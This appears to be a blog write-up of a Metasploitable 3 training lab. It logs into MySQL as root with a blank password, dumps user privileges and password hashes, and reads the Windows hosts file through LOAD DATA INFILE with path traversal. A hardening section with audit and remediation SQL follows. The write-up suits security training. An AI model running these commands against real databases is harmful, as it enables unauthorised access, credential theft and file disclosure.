Metasploitable 3 — MySQL Blank Creds and Local File Read

Jason Jacobs, MSc.
Jun 29, 2024

Everybody loves a database until it gets pwned with two commands by your local script kiddie. Let’s work on the Metasploitable 3, Windows Server 2008 VM once again to kick off some practice.

Enumeration

With no hesitation, we’re launching all of nmap’s mysql enumeration scripts to gather as much information about the target system as possible:

nmap -Pn -p3306 --script=mysql-* TARGETIP -v

Blank root Password

From this command we have gotten “root:<empty> — Valid credentials” from the mysql-enum nmap script.

Results from the mysql nmap scripts.

Let’s connect to the mysql service on the Metasploitable 3 system from here. It was also noted that we had to disable SSL to be able to connect.

mysql -u root -h TARGETIP -p --ssl=FALSE 
Successful connection to mysql service.
Databases observed.

MySQL User Enumeration

# Get current user (and all users) privileges and hashes

use mysql;
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;
SELECT * FROM mysql.user;
MySQL User Enumeration.
mysql.user enumeration.

Local File Read

# Reading local files on the target system

use test;

CREATE TABLE test (text VARCHAR(100));
Query OK, 0 rows affected (0.230 sec)

LOAD DATA INFILE '../../../../../../../../../\\Windows\\System32\\drivers\\etc\\hosts' INTO TABLE test FIELDS TERMINATED BY '\n';
Query OK, 23 rows affected (0.163 sec)
Records: 23 Deleted: 0 Skipped: 0 Warnings: 0

select * from test;
Local file read of the hosts file on the Windows 2008 server.

We were then able to escape the “c:\wamp\bin\mysql\mysql5.5.20\” directory on the target system to read the hosts file.
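From the defender's side, both findings above (the empty root password and the file read through LOAD DATA INFILE) can be audited and closed from the same mysql client. The statements below are an added example, not part of the original walkthrough; they assume the MySQL 5.5 mysql.user layout queried earlier, and the password placeholder, the app_user account and the import directory are hypothetical.

```sql
-- Added hardening example; run as an administrator in the mysql client.
-- Column names follow the MySQL 5.5 mysql.user table queried above.

-- 1. Accounts with no password (why root:<empty> was accepted).
SELECT User, Host FROM mysql.user WHERE Password = '';

-- 2. Accounts allowed to log in from other machines.
SELECT User, Host FROM mysql.user
 WHERE Host NOT IN ('localhost', '127.0.0.1', '::1');

-- 3. Accounts holding FILE, the privilege LOAD DATA INFILE needs
--    in order to read files on the server.
SELECT User, Host FROM mysql.user WHERE File_priv = 'Y';

-- 4. Directory restriction for server-side file import/export.
--    An empty Value means no restriction: the server will read any
--    path its service account can read, as the hosts file read showed.
SHOW VARIABLES LIKE 'secure_file_priv';

-- Remediation ---------------------------------------------------------

-- Give every passwordless root entry a password (placeholder value;
-- replace it before running).
UPDATE mysql.user
   SET Password = PASSWORD('REPLACE_WITH_STRONG_PASSWORD')
 WHERE User = 'root' AND Password = '';

-- Drop anonymous accounts and root entries reachable over the network.
DELETE FROM mysql.user WHERE User = '';
DELETE FROM mysql.user
 WHERE User = 'root' AND Host NOT IN ('localhost', '127.0.0.1', '::1');
FLUSH PRIVILEGES;

-- Remove FILE from application accounts that do not need it
-- ('app_user'@'localhost' is a hypothetical account name).
REVOKE FILE ON *.* FROM 'app_user'@'localhost';

-- secure_file_priv is read-only at runtime. Set it under [mysqld] in
-- my.ini and restart the service (hypothetical directory shown):
--   secure_file_priv = "C:/mysql-import"
```

After the restart, re-run query 4 and repeat the LOAD DATA INFILE test; a path outside the configured directory should now be rejected.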

How much further would you go?

Happy Hacking XD!
